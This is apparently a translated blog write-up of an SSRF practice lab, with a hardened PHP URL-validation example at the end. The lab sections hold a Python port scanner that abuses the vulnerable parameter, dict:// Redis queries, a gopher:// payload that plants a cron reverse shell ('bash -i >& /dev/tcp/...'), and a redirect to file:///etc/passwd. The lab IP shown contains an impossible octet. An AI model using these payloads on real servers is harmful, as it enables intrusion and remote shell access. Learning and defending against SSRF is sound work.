SSRF-lab
2022-06-25 05:15:00 【Mccc_ li】
SSRF (Server-Side Request Forgery)
Principle:
Many web applications provide a feature for fetching data from other servers. Given a user-specified URL, the web app can fetch an image, download a file, read a file's contents and so on. If this feature is abused, the flawed web application can be used as a proxy to attack both remote servers and the local server itself.
As the diagram shows:
Under normal circumstances, the client asks the server for a specified URL. When the server receives the request, it first checks whether the URL is legitimate, then requests the resource the URL points to from the intranet, and finally returns that resource to the client.
If the URL a malicious user passes in is not filtered, he can use SSRF to reach intranet resources that are not supposed to be accessible (that is, the client is not allowed to access intranet resources directly, but the server can; this is SSRF).
In PHP, functions that can lead to SSRF:
file_get_contents()
fsockopen()
curl_exec()
Experiment 1 (basic)

Looking at the source, you can see it uses the curl library:
curl_init — initialise a cURL session.
curl_setopt ( resource $ch , int $option , mixed $value ) : bool
    ch: the cURL handle returned by curl_init().
    option: the CURLOPT_XXX option to set.
    value: the value to assign to that option.
    In the lab's code the second argument is CURLOPT_URL, which takes the URL to fetch.
    The third argument is the value for that option; here it is the POST parameter handler.
curl_exec ( resource $ch ) : mixed — execute the given cURL session. (This is the key point: nothing filters the parameter we pass in, so the server makes whatever request we ask for, and that is what can be abused.)
Protocols supported by curl:
file:// can read local files
dict:// refers to definitions or word lists made available via the DICT protocol
sftp:// SSH file transfer protocol
tftp:// trivial file transfer protocol
ldap:// lightweight directory access protocol
gopher:// Gopher is a distributed document delivery service; with it, users can seamlessly browse, search and retrieve information that resides in different locations.
Using file:// to read a file:
Using dict:// to scan ports:
import requests

# Lab endpoint from the original post; the vulnerable page hands the "handler"
# parameter straight to curl, so the server makes the connection on our behalf.
url = "http://123.912.114.237:80/testhook.php"
ports = range(1, 6380)

for port in ports:
    target = "127.0.0.1:{0}".format(port)
    try:
        s = requests.post(url, data={"handler": target}, timeout=1)
        # a non-empty response means the server got an answer from that port
        if len(s.text) > 0:
            print(str(port) + " port open")
    except requests.exceptions.ConnectTimeout:
        # a hanging connection is also treated as an open port here
        print(str(port) + " port open")
Using the dict protocol to view the Redis service's configuration information:
dict://127.0.0.1:6379/info

dict://127.0.0.1:6379/KEYS * retrieves the contents of Redis.
It can also be used to get a reverse shell. I haven't studied Redis yet, so I'll put it here for now and look at it later:
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/www/html/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
Experiment 2 (advance1)

Looking at the source code, you can see that a regular expression is used to check the protocol type: it tests whether the parameter we submit begins with http or https.
I think one could also use a 302 redirect to get around the http/https check, that is, load a PHP file from an external host:
<?php
header("Location:file:///etc/passwd");
?>
That should bypass the check. I enabled curl's redirect-following option, but I don't know why it didn't succeed; I'll leave it as an open question and research it later.
Detailed SSRF bypass methods are collected here: Add link description
This lab is abandoned here.
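The following is a hardened version of the pattern both levels above exploit (take the handler parameter, hand it to curl), written for this page as an added example; it is not the lab's code. The weak prefix check mirrors the regex used in advance1. The validator restricts the scheme to http/https (so dict://, gopher:// and file:// from the protocol list are refused), resolves the host and rejects loopback, private and reserved addresses (the intranet access described under "Principle" and the 127.0.0.1 port scan), and curl is configured to not follow redirects and to allow only http/https even if it did, which closes the 302-to-file:// route. The function names and the sample URLs are assumptions made for this example.

```php
<?php
// Added example, not the lab's code. Function names are assumptions; sample URLs
// are constructed and use documentation address ranges.

// The kind of check the advance1 level does: a regex on the prefix only.
// It accepts http://127.0.0.1:6379/ and anything that later 302s to file://.
function weak_check(string $url): bool
{
    return (bool) preg_match('#^https?://#i', $url);
}

// True only for addresses outside private, loopback, link-local and reserved ranges.
function is_public_ip(string $ip): bool
{
    return filter_var(
        $ip,
        FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE
    ) !== false;
}

// Parse and validate a user-supplied URL. Returns the pieces needed to pin the
// request, or null when the URL must be refused.
function validate_fetch_url(string $url): ?array
{
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return null;
    }
    $scheme = strtolower($parts['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;                       // file://, dict://, gopher:// ... are refused
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;                       // no user:pass@host ambiguity
    }
    $host = $parts['host'];
    $port = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);

    // A literal IPv4 address is checked directly; a hostname is resolved once and
    // every returned address must be public (gethostbynamel only returns IPv4, so
    // bracketed IPv6 literals and AAAA-only names are refused by this version).
    $ips = filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)
        ? [$host]
        : (gethostbynamel($host) ?: []);
    if ($ips === []) {
        return null;
    }
    foreach ($ips as $ip) {
        if (!is_public_ip($ip)) {
            return null;
        }
    }
    return ['scheme' => $scheme, 'host' => $host, 'port' => $port, 'ip' => $ips[0]];
}

// Fetch the URL with curl locked down: no redirects, only http/https, and the
// connection pinned to the address that passed the check.
function safe_fetch(string $url)
{
    $target = validate_fetch_url($url);
    if ($target === null) {
        return false;
    }
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL             => $url,
        CURLOPT_RETURNTRANSFER  => true,
        CURLOPT_FOLLOWLOCATION  => false,   // a 302 to file:///etc/passwd goes nowhere
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        // Pin host:port to the checked IP so a DNS answer that changes between the
        // check and the request (rebinding) cannot steer curl somewhere else.
        CURLOPT_RESOLVE         => [sprintf('%s:%d:%s', $target['host'], $target['port'], $target['ip'])],
        CURLOPT_CONNECTTIMEOUT  => 3,
        CURLOPT_TIMEOUT         => 5,
    ]);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;
}

// Demo with constructed inputs: what the prefix regex lets through versus the validator.
$samples = [
    'http://127.0.0.1:6379/',          // loopback Redis; passes the regex
    'dict://127.0.0.1:6379/info',      // non-http scheme
    'http://10.0.0.5/admin',           // RFC 1918 address
    'http://203.0.113.10/data.json',   // TEST-NET-3, stands in for a public address
];
foreach ($samples as $u) {
    printf("%-32s regex:%s  validator:%s\n",
        $u,
        weak_check($u) ? 'pass' : 'fail',
        validate_fetch_url($u) === null ? 'refused' : 'allowed');
}
```

Only the last sample is allowed by the validator, while the regex passes the first, third and fourth. The scheme allowlist is what removes dict:// and gopher:// from reach, the address check is what stops the loopback port scan, and CURLOPT_FOLLOWLOCATION together with CURLOPT_REDIR_PROTOCOLS is what defeats the redirect-to-file:// idea even if redirect following were turned back on. On PHP 8.2 and later, FILTER_FLAG_GLOBAL_RANGE can be added to is_public_ip to also reject documentation and other non-global ranges.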